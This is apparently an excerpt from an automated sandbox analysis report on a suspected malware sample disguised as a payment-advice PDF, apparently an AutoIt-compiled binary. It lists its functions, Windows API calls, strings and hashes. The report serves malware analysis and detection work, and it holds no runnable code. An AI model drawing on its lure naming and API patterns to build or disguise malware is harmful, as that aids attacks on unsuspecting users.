                                                              • Opcode ID: 1436bc0c107583539abc9d067f739b7201ceba5238934521397c4009c7150fc5
                                                              • Instruction ID: 0132151b2d8a2416ea74807e5342bb96ff66fc3046f722ab86b9268af647b297
                                                              • Opcode Fuzzy Hash: 1436bc0c107583539abc9d067f739b7201ceba5238934521397c4009c7150fc5
                                                              • Instruction Fuzzy Hash: 45F0FEB25543067EF2102765BC06FBB7A9CFB09795F404021BB08E5192DB755C2097A9
                                                              Function 008A6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(?), ref: 008A6BE6
                                                                • Part of subcall function 008A76C4: _memset.LIBCMT ref: 008A76F9
                                                              • _memmove.LIBCMT ref: 008A6C09
                                                              • _memset.LIBCMT ref: 008A6C16
                                                              • LeaveCriticalSection.KERNEL32(?), ref: 008A6C26
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                                              • String ID:
                                                              • API String ID: 48991266-0
                                                              • Opcode ID: a2a9ef78f810501fd056caf82ee167b76fb076716bbd57bf524379452bbc0074
                                                              • Instruction ID: 2749ed8fa8ca5c595d24ad03804f669b89278ab13d65ee1aeb779cab6196a9a2
                                                              • Opcode Fuzzy Hash: a2a9ef78f810501fd056caf82ee167b76fb076716bbd57bf524379452bbc0074
                                                              • Instruction Fuzzy Hash: 56F0543A100100ABDF016F59DC85E4ABB2AFF45361F048061FE089E227C731E811DBB5
                                                              Function 00842218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 00842231
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0084223B
                                                              • SetBkMode.GDI32(?,00000001), ref: 00842250
                                                              • GetStockObject.GDI32(00000005), ref: 00842258
                                                              • GetWindowDC.USER32(?,00000000), ref: 0087BE83
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0087BE90
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0087BEA9
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0087BEC2
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0087BEE2
                                                              • ReleaseDC.USER32(?,00000000), ref: 0087BEED
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: c81a80de8fdc24fdbc112808442d4c1e545540ef7bd5ccd4401abc28cbcab6c6
                                                              • Instruction ID: cb3ec2724169d0ebdd5e625930d659908cdf18aac52b937ee6ebbf029edec82c
                                                              • Opcode Fuzzy Hash: c81a80de8fdc24fdbc112808442d4c1e545540ef7bd5ccd4401abc28cbcab6c6
                                                              • Instruction Fuzzy Hash: AFE03932104244AAEB225F64EC0DBD83B22FB05332F148366FB69880E687B18980DB12
                                                              Function 00898712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0089871B
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,008982E6), ref: 00898722
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008982E6), ref: 0089872F
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,008982E6), ref: 00898736
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: 07c64bd0bfd9968a8e49cf8275486b3017704978f10f939a3df15450748e23f2
                                                              • Instruction ID: c3ebcec8919de8061b0c218d80a2490160c44f37a80c77cba449cabeb6b6159f
                                                              • Opcode Fuzzy Hash: 07c64bd0bfd9968a8e49cf8275486b3017704978f10f939a3df15450748e23f2
                                                              • Instruction Fuzzy Hash: 60E08676611212EBEB206FF15D0CF567BBEFF51B92F144828B745CA041DB348445C750
                                                              Function 0089B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0089B4BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              • Opcode ID: 5861f6eda1ba7f7f4083066e3e715929bcaf72211537c4f346feecdf41db39e0
                                                              • Instruction ID: 8624fa83ec30304505aa0ea97e62b57bcd3135ee102a766e5931840a59d5b0f1
                                                              • Opcode Fuzzy Hash: 5861f6eda1ba7f7f4083066e3e715929bcaf72211537c4f346feecdf41db39e0
                                                              • Instruction Fuzzy Hash: 8E914870200605EFDB14EF68D984A6ABBE5FF49710F24856EF94ACB391DB70E841CB50
                                                              Function 008AAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • __wcsnicmp.LIBCMT ref: 008AB02D
                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008AB0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                              • String ID: LPT
                                                              • API String ID: 3222508074-1350329615
                                                              • Opcode ID: 4c6cd53164174b88a040c96b2594c33b127affe46c212e3696a9906d99ff3543
                                                              • Instruction ID: f480bccf530befa9766872d89d5ac98c237e5d31edfe0df77d35a4214b6267aa
                                                              • Opcode Fuzzy Hash: 4c6cd53164174b88a040c96b2594c33b127affe46c212e3696a9906d99ff3543
                                                              • Instruction Fuzzy Hash: 12618F75A00219AFDB14DF98C8A1EAEB7B4FF09310F10406AF956EB792D770AE44CB51
                                                              Function 00852957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00852968
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00852981
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: ecbafaa564f3791532ddf052c12fdaf5f2161f165e4a8553d0bdde52402715f6
                                                              • Instruction ID: 526a7c1e381f41b0ec68b118b21b584c2cf096d80933f08947e303818ae17f18
                                                              • Opcode Fuzzy Hash: ecbafaa564f3791532ddf052c12fdaf5f2161f165e4a8553d0bdde52402715f6
                                                              • Instruction Fuzzy Hash: 2B5138714187489BD320EF18D886BAFBBE8FF85344F42885DF2D9811A1DB718529CB67
                                                              Function 008A9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00844F0B: __fread_nolock.LIBCMT ref: 00844F29
                                                              • _wcscmp.LIBCMT ref: 008A9824
                                                              • _wcscmp.LIBCMT ref: 008A9837
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: a2c74d6753fc8bbcf829f74c4916750083ac4249097058f1b06c4637829b341d
                                                              • Instruction ID: 491f4bd04aaee264e11d0b302606fe02cc6b428384ec44005c104c82ff4cdc15
                                                              • Opcode Fuzzy Hash: a2c74d6753fc8bbcf829f74c4916750083ac4249097058f1b06c4637829b341d
                                                              • Instruction Fuzzy Hash: 56419471A0421DBAEF219BA4CC45FEFBBB9FF86710F014479F904E7181EA759A048B61
                                                              Function 008B258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008B259E
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008B25D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |
                                                              • API String ID: 1413715105-2343686810
                                                              • Opcode ID: 66549f98c1771aa9c225be93b9c230b5d98ffa9d76c2027a01b3853c7e53f7df
                                                              • Instruction ID: 279a23542a42161aad32b17bb00d91ad15c68d1088955a1802e551f5388c3829
                                                              • Opcode Fuzzy Hash: 66549f98c1771aa9c225be93b9c230b5d98ffa9d76c2027a01b3853c7e53f7df
                                                              • Instruction Fuzzy Hash: B131F47180011DABCF11AFA4CC85EEEBFB9FF18350F104069E915AA262EB315956DB61
                                                              Function 008C7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 008C7B61
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008C7B76
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: 4629e6c0c6c47fe47cdf227c284e438cd22ae226749a109fe6e7e5340ff02a48
                                                              • Instruction ID: 10389604879833145b10a42a67f19a8cf47aed4560336019372038fe63212d37
                                                              • Opcode Fuzzy Hash: 4629e6c0c6c47fe47cdf227c284e438cd22ae226749a109fe6e7e5340ff02a48
                                                              • Instruction Fuzzy Hash: 1B41E674A0521A9FDB14CF68C981FEABBB9FB08314F14416AE904EB391E771A951CF90
                                                              Function 008C6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 008C6B17
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008C6B53
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: dff811d80d02424fde256400e6431bc6367f94e5fa1dcefd3a51c5a5a8a7ec75
                                                              • Instruction ID: 4267918b2d5ac69adade6daaa2bd36f1056e2b56ddb749eeb8aa1ff84aadbb7e
                                                              • Opcode Fuzzy Hash: dff811d80d02424fde256400e6431bc6367f94e5fa1dcefd3a51c5a5a8a7ec75
                                                              • Instruction Fuzzy Hash: 85315C71100608AAEB109F68D841FBB77B9FF48764F10862DF9A5D7191DA31EC91DB60
                                                              Function 008A28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2911
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008A294C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 8dff00b1700fee5d1ecc9756c7f33d0afeb838907355dcd4df4d0973b2a66aa3
                                                              • Instruction ID: 482951044a39badb318112cfe7fc49829d103de8dc574066f53a4c1d87654ce4
                                                              • Opcode Fuzzy Hash: 8dff00b1700fee5d1ecc9756c7f33d0afeb838907355dcd4df4d0973b2a66aa3
                                                              • Instruction Fuzzy Hash: EA319C316003099BFB348E5CC985FAFBFA9FF46750F180069E985E65A1E7709941CB51
                                                              Function 008B39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __snwprintf.LIBCMT ref: 008B3A66
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf_memmove
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 3506404897-2584243854
                                                              • Opcode ID: 5bd3c4cfebb42738dc96b4ed9bb81d9851f8f774ff8b050a0fe7f1e1ba4b30f0
                                                              • Instruction ID: ba948b13231a870e06efc61143ec9c68601c6d3948289a3c5d41709712d57bac
                                                              • Opcode Fuzzy Hash: 5bd3c4cfebb42738dc96b4ed9bb81d9851f8f774ff8b050a0fe7f1e1ba4b30f0
                                                              • Instruction Fuzzy Hash: 68215C3160062DAFCF10EFA8CC82AAE77B9FF44710F600454E555EB282DB34EA55CB62
                                                              Function 008C66D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008C6761
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008C676C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: 394ee815e9aa17f1e88a53dbbdb403a3c6cd4b6fc9e33eac410d8665598ad634
                                                              • Instruction ID: d69a7a9efa007045fec7dd45fc9bc2b08b12c707292d5b85d8dc1b278dd6a311
                                                              • Opcode Fuzzy Hash: 394ee815e9aa17f1e88a53dbbdb403a3c6cd4b6fc9e33eac410d8665598ad634
                                                              • Instruction Fuzzy Hash: FC119071200208AFEF118F54CC81FBB377AFB48368F100629F918D7290E631DC6197A0
                                                              Function 008C6C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00841D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00841D73
                                                                • Part of subcall function 00841D35: GetStockObject.GDI32(00000011), ref: 00841D87
                                                                • Part of subcall function 00841D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00841D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 008C6C71
                                                              • GetSysColor.USER32(00000012), ref: 008C6C8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: bfb8e8443fbf3d818f32a0f26d0d7af28d6b877f94d0c42bd0c6b88e28b5e091
                                                              • Instruction ID: a72048441b14b1ae043f204c82d3e93314593d230ac25ef9b2d8ff5b4daa2954
                                                              • Opcode Fuzzy Hash: bfb8e8443fbf3d818f32a0f26d0d7af28d6b877f94d0c42bd0c6b88e28b5e091
                                                              • Instruction Fuzzy Hash: 0821F672610209AFEF04DFA8CC45EEA7BB9FB08314F014629FA95D2251E635E861DB61
                                                              Function 008C6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 008C69A2
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008C69B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: ecf526e153634f2a37cf3d1f896f319bf49797ca6c35c5c31df9bd9089c6f45f
                                                              • Instruction ID: 109222a6969e68378cbf1b252ecca8312474306a08ac52610eedad2d05ddfa17
                                                              • Opcode Fuzzy Hash: ecf526e153634f2a37cf3d1f896f319bf49797ca6c35c5c31df9bd9089c6f45f
                                                              • Instruction Fuzzy Hash: 8A116D71510108ABEB108E749C45FAB3B7AFB05378F504728FAA5D61E0D731DC65AB60
                                                              Function 008A29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2A22
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008A2A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 9b17b056a6fe93f13d33e7bf25ad037d247840c061893d971fd5bf57090fe384
                                                              • Instruction ID: a8bc64ece9367c7328a1e891762518cf1a7d79f42dcfce2ce510a91589b026d2
                                                              • Opcode Fuzzy Hash: 9b17b056a6fe93f13d33e7bf25ad037d247840c061893d971fd5bf57090fe384
                                                              • Instruction Fuzzy Hash: B911D332A05128ABEF30DA5CD844B9A77B9FB46314F055021ED55E7690D730BD06CB91
